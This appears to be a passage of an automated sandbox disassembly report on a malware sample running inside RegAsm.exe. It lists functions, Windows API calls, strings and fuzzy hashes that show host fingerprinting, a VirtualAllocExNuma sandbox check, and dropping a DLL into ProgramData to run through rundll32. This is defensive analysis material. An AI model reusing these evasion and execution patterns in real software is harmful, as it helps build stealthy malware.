String ID:
API String ID: 181426013-0
Opcode ID: 7d4897d747e7ef0beed536b4b4b0b92ea2d60fce0529d20ac995c1c4f355c362
Instruction ID: 6a0cd8fa7e225e6c006074d00fbba8e3dbf1a4d2fadc77ac212ba1d7b4cf305b
Opcode Fuzzy Hash: 7d4897d747e7ef0beed536b4b4b0b92ea2d60fce0529d20ac995c1c4f355c362
Instruction Fuzzy Hash: 90118E70A0024ADFCB009FE4CC989EEBBB6AF48300F60417EF215E72A0CB394945CB58

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00418425), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 6949bca9ab2b227e4f2a661da1d8de6a1bed4219bb212cce8d545c4fc8dc41ef
Instruction ID: e5ee32ef113caba72e4fba8e8ad32d71807a6b90e09b0a6cab134cfb67d5346f
Opcode Fuzzy Hash: 6949bca9ab2b227e4f2a661da1d8de6a1bed4219bb212cce8d545c4fc8dc41ef
Instruction Fuzzy Hash: C8F0C27238122077F22426763C6EFAB1A6C9B42F56F205036F308FB2D1D669980496BC

Function 004128B8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412ADA

Strings

C:\ProgramData\, xrefs: 004128EB
C:\Windows\system32\rundll32.exe, xrefs: 00412A39
.dll, xrefs: 00412943
"" , xrefs: 00412988

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: ffc3e70b52bcf17d0a3e480983e00a0abd5bcfe697a824163a0fbfee29b4802e
Instruction ID: 457daa63824f7e13f72d76d6ac2e2a337dfd8cbc6b8a24ac7106625f0672361b
Opcode Fuzzy Hash: ffc3e70b52bcf17d0a3e480983e00a0abd5bcfe697a824163a0fbfee29b4802e
Instruction Fuzzy Hash: 7571CE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B71A1DBB86E8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436EC0,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 1749be29d3dd68260622f81a7daa4c70c2b74cb3808367ce7b6629c85915a66b
Instruction ID: eaa9699d99970f094ec56ea598f8bcefcafc7b191d4fd2852e1e4dfcc09b4f6a
Opcode Fuzzy Hash: 1749be29d3dd68260622f81a7daa4c70c2b74cb3808367ce7b6629c85915a66b
Instruction Fuzzy Hash: 22114671A00118ABDB21EB75DD86FDD73B8AB18704F4004A7B645E7191DAB8AEC88B58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436904,Display Resolution: ,004368E8,00000000,User Name: ,004368D8,00000000,Computer Name: ,004368C4,AV: ,004368B8,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: d79741ca002af0e01697550c79ce401c556a44aa8bd67276735a06aa108c3ed8
Instruction ID: 89a0011b884230c286ab915a2218d7c710c58f2c104f88e4b7f62adc399c8573
Opcode Fuzzy Hash: d79741ca002af0e01697550c79ce401c556a44aa8bd67276735a06aa108c3ed8
Instruction Fuzzy Hash: 0601A9B1A00218BBDB14DFB4DC45EEEB7B9EF08705F00006AF602D72D0DA74D9858759

Function 00410F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000,Local Time: ,00436920), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000,Local Time: ,00436920,Keyboard Languages: ,00436904), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,|hC,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(|hC,00000000,00000000,00000000,000000FF,?,?,?,004141AA,Processor: ,[Hardware],00436944,00000000,TimeZone: ,00436934,00000000), ref: 00410FA6

Strings

|hC, xrefs: 00410F74, 00410FAC, 00410FA3, 00410F77

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: |hC
API String ID: 3676486918-3764107683
Opcode ID: 3a3bf566e5d14bd86510d550d31684ff72117dc938373aff3bbaac8ed3a555bf
Instruction ID: 6b73a9ef42d55ad89eef3be0dd752bfde52c2d41e6edf9313a1e8d827cfc0210
Opcode Fuzzy Hash: 3a3bf566e5d14bd86510d550d31684ff72117dc938373aff3bbaac8ed3a555bf
Instruction Fuzzy Hash: 8FF03075240308FBEB209B90ED0AFAA7B7EEB44706F141054F602A51E0D7F169809B61

Function 0041BB7A Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CB47,?,0041CBD5,00000000,06400000,00000003,00000000,004174D8,.exe,00436C50), ref: 0041BBC7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CB47,?,0041CBD5,00000000,06400000,00000003,00000000), ref: 0041BBFF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: 4f95cae7d8c0e58236d79f2b43e073f46f5cc0668e690afd819378debf498df0
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: B7317BB0504745DFEB309F259884B67B6E8E714358F108A3FE19686650E73898C4CBD9

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 6df7f2fe5fa50a754d996a724841f60c6b1d9d47ba9343e20b2e2b63c9f39d7c
Instruction ID: 97cc7f21c385fd788e24c208e02f639e4ed5bf4effbbcdc787b6e6578252453a
Opcode Fuzzy Hash: 6df7f2fe5fa50a754d996a724841f60c6b1d9d47ba9343e20b2e2b63c9f39d7c
Instruction Fuzzy Hash: DE011E71D00218ABCB159BA9DC45ADEBFB8AF55330F108216F925F72E0D7B456058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437188,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367BF,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: e8b8151910482a87d8e03e4eaf278764bf1ef1c4f1584a9af6d2ea5ec5032007
Instruction ID: 0dea202e185662f6244741e91635fdd2d0e4523b6565790d4b4ad7e7d13042de
Opcode Fuzzy Hash: e8b8151910482a87d8e03e4eaf278764bf1ef1c4f1584a9af6d2ea5ec5032007
Instruction Fuzzy Hash: B6316E71940714ABCB32EF29ED024AD7BB2AF8470AF10613BE444B72E1DB795941CF89

Function 00416D1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416D26
lstrlenA.KERNEL32(?,0000001C), ref: 00416D31
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416DB5

Strings

ERROR, xrefs: 00416DAD

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: a444407ac5c68c1ef25417a0b15535d458b840e2764612520bb4565029eb60a0
Instruction ID: c9df96c1872c77f9070c951095d14a60fedb70f3ef81e9ffa3016dfe1e36c506
Opcode Fuzzy Hash: a444407ac5c68c1ef25417a0b15535d458b840e2764612520bb4565029eb60a0
Instruction Fuzzy Hash: A4114C71900509AFCB50FF75E902ADDBBB1BF04318B90413AE814E35A1D778E9A98FC9

Function 00412446 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,004149E5), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,?,IA,00000000,?,?,?,004149E5), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,004149E5), ref: 0041249E

Strings

IA, xrefs: 0041247C, 0041247F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: IA
API String ID: 1065093856-3293647318
Opcode ID: cf20da114efff6fa4d35c9159cd20dc21c98014b54c2530e9e9ca5610b1ffad7
Instruction ID: ea6368a2d3dfb5a0d1465626f8dac4ddb20644eed2573cc3b827f6803c15914b
Opcode Fuzzy Hash: cf20da114efff6fa4d35c9159cd20dc21c98014b54c2530e9e9ca5610b1ffad7
Instruction Fuzzy Hash: 9DF02472200118BFDB11AFA4DD8AFFB375CDF12398F000022F951DA1E0D3A49C5157A4

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,B=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

B=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: B=A
API String ID: 3183270410-3882662148
Opcode ID: b59d4a97267323de8a9a49f6f760fc42aec8771717ae3789ed2c7a7dd97a6711
Instruction ID: a445180d5272b997ff066df13e01481b69d790d3f608600d5f07f63019600b2b
Opcode Fuzzy Hash: b59d4a97267323de8a9a49f6f760fc42aec8771717ae3789ed2c7a7dd97a6711
Instruction Fuzzy Hash: 10F0B471600218ABD720EF69DD85FEEB7B99B48B04F00006AB645D71D0DEB4D9C5CB54

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

